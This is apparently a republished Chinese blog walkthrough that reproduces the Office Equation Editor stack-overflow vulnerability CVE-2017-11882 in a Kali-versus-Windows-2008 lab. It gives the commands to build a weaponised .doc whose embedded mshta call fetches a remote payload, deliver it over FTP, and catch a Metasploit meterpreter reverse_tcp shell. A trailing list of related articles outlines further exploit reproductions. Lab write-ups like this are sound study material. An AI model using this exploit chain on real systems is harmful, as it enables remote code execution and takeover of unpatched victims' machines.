Office远程代码执行漏洞(CVE-2017-11882)漏洞复现

这篇具有很好参考价值的文章主要介绍了Office远程代码执行漏洞(CVE-2017-11882)漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.漏洞原理

CVE-2017-11882允许攻击者在当前用户的上下文中运行任意代码,导致无法正确处理内存中的对象,即为“ Microsoft Office Memory Corruption Vulnerability “,栈溢出的远程执行漏洞

该漏洞是在EQNEDT32.EXE组件的缓冲区溢出导致。当受害用户打开Office文档时就有可能被漏洞利用,危害极大。 原因是由于EQNEDT32.EXE进程读入包含MathType的ole数据。函数给Font Name数据分配的大小是0x24个字节,超过大小会造成栈缓冲区溢出。而程序在拷贝公式Font Name数据时没有对其长度进行校验,从而导致漏洞发生

通杀以下没有更新的Office版本:

  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016
  • MicrosoftOffice 365

漏洞环境:

攻击机:Kali(10.10.0.11)
工具:metasploit

目标靶机:Windows2008 (10.10.0.9)
工具:Office软件、Ftpserver

2.在Kali平台查看漏洞利用文件

准备攻击的payload文件(doc文件):

该文件由Github的CVE-2017-11882.py攻击脚本生成

python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o payload-cale.doc

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux

它的功能是打开office文本的同时能够弹出计算机程序,本实验通过此文本验证目标靶机上是否存在Office远程代码执行漏洞(CVE-2017-11882)漏洞


3.登录目标靶机,打开FTP服务器

打开FTP服务器。点击最左面绿色按钮,启动ftp服务器:

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux

可以看到以下变化:ftp服务器启动。显示“FTP服务在线”。FTP文件目录是在靶机桌面上


4.登录Kali,利用FTP服务器上传payload-cale.doc文件

Kali终端上切换到root账户,之后使用ftp工具连接靶机服务:

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux

登录ftp成功后,将payload-cale.doc文件通过命令上传到目标靶机windows2008上

put /home/college/CVE-2017-11882-payload/payload-cale.doc /payload-cale.doc

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux


5.登录目标靶机,触发doc文件,验证存在漏洞

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux


6.登录kali平台,执行命令,生成含有攻击代码的doc文档

python CVE-2017-11882.py -c "mshta http://10.10.0.11:8080/payload" -o payloadattack.doc 

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux

利用FTP服务上传文件到目标靶机:

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux


7.在kali平台上启动并配置metapsloit

启动:

msfconsole

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux

查找CVE-2017-11882 漏洞:

search CVE-2017-11882 

加载攻击利用程序,设置payload及各项参数:

 use exploit/windows/smb/CVE-2017-11882 

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux

设置payload为反弹tcp:

set payload windows/meterpreter/reverse_tcp

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux

设置本机地址:

set lhost 10.10.0.11

设置uri的路径:

 set URIPATH payload

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux

运行payload,启动利用后,msf会监听本机8080端口,靶机访问10.10.0.11:8080/payload,打开链接就会得到反弹到4444端口的tcp会话中

发起漏洞攻击:

exploit -j 

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux


8.在目标平台双击payloadattack.doc文档,触发漏洞

在靶机桌面上可以看到上步ftp上传的文件的文件,双击打开此文件,即可建立连接了

Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux
Office远程代码执行漏洞(CVE-2017-11882)漏洞复现,网络安全专题,microsoft,安全,linux文章来源地址https://www.toymoban.com/news/detail-527850.html

到了这里,关于Office远程代码执行漏洞(CVE-2017-11882)漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Jboss反序列化远程代码执行漏洞(CVE-2017-12149)

    :Jboss文件下的httplnvoker组件中的Readonly Accessfilter过滤器中的dofilter没有限制来自客户端的序列化数据而进行反序列化。 漏洞影响版本:Jboss5.x Jboss6.x 利用vulhub搭建Jboss cd vulhub cd jboss cd CVE-2017-12149 docker-compose build (若出现镜像问题,直接执行下面命令) docker-compose up -d 访问:h

    2024年02月07日
    浏览(53)
  • 漏洞复现 CVE-2023-0297( pyload远程代码执行漏洞 )

    在 addcrypted2() 函数中,对传入的参数 jk 解析后用 eval_js() 作为 JS 语句执行。 利用 JS 中 pyimport 导入 OS 包,执行系统命令(文件操作,进程管理),还可以利用 os.system() 执行 shell 命令。 构建 payload 过程比较简单,只要传入所需的 package, crypted, jk, passwords 四个参数即可,这里

    2024年02月08日
    浏览(39)
  • 漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)

    Drupal 7.x 和 8.x 的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。 -c 后面接命令,紧随账号

    2024年02月16日
    浏览(54)
  • CVE-2019-0708远程桌面服务远程执行代码漏洞复现

    1、相关简介 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远

    2024年02月10日
    浏览(50)
  • PhpMyAdmin远程执行代码漏洞复现 (CVE-2016-5734)

    0x01 漏洞介绍 phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 phpMyAdmin 中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用 preg_replace e 修饰符。 可借助特

    2024年02月11日
    浏览(41)
  • [漏洞复现] jenkins 远程代码执行 (CVE-2019-100300)

    拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码。此漏洞需要一个账号密码和一个存在的job。 Jenkins的pipeline主要是通过一个配置文件或者job里面的pipeline脚本配置来设定每个job的步骤. pipeline定义了几乎所有要用到的流程, 比如执行shell, 存档, 生成测试

    2024年02月16日
    浏览(44)
  • CVE-2019-11043(PHP远程代码执行漏洞)复现

    今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043(PHP远程代码执行漏洞)复现。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授权设备进行渗透测试! CVE-2019-11043漏

    2024年02月06日
    浏览(53)
  • 复现CVE-2022-10270(向日葵远程代码执行漏洞)

    目录 引言 漏洞描述 影响版本: 原理: 环境搭建 手动复现 脚本复现 修复建议         本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔者不提供担保!!!         向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持

    2024年02月07日
    浏览(50)
  • drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现

    drupal是一个开源PHP管理系统,架构使用的是php环境+mysql数据库的环境配置。在 Drupal 6.x,7.x,8.x 系列的版本中,均存在远程代码执行漏洞。该漏洞产生的原因在于Drupal对表单渲染时未进行严格的安全过滤,导致,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码。 首

    2024年02月02日
    浏览(43)
  • CVE-2018-0886-Microsoft Windows CredSSP 远程执行代码漏洞复现

    cve-2018-0886,网络

    2024年02月12日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包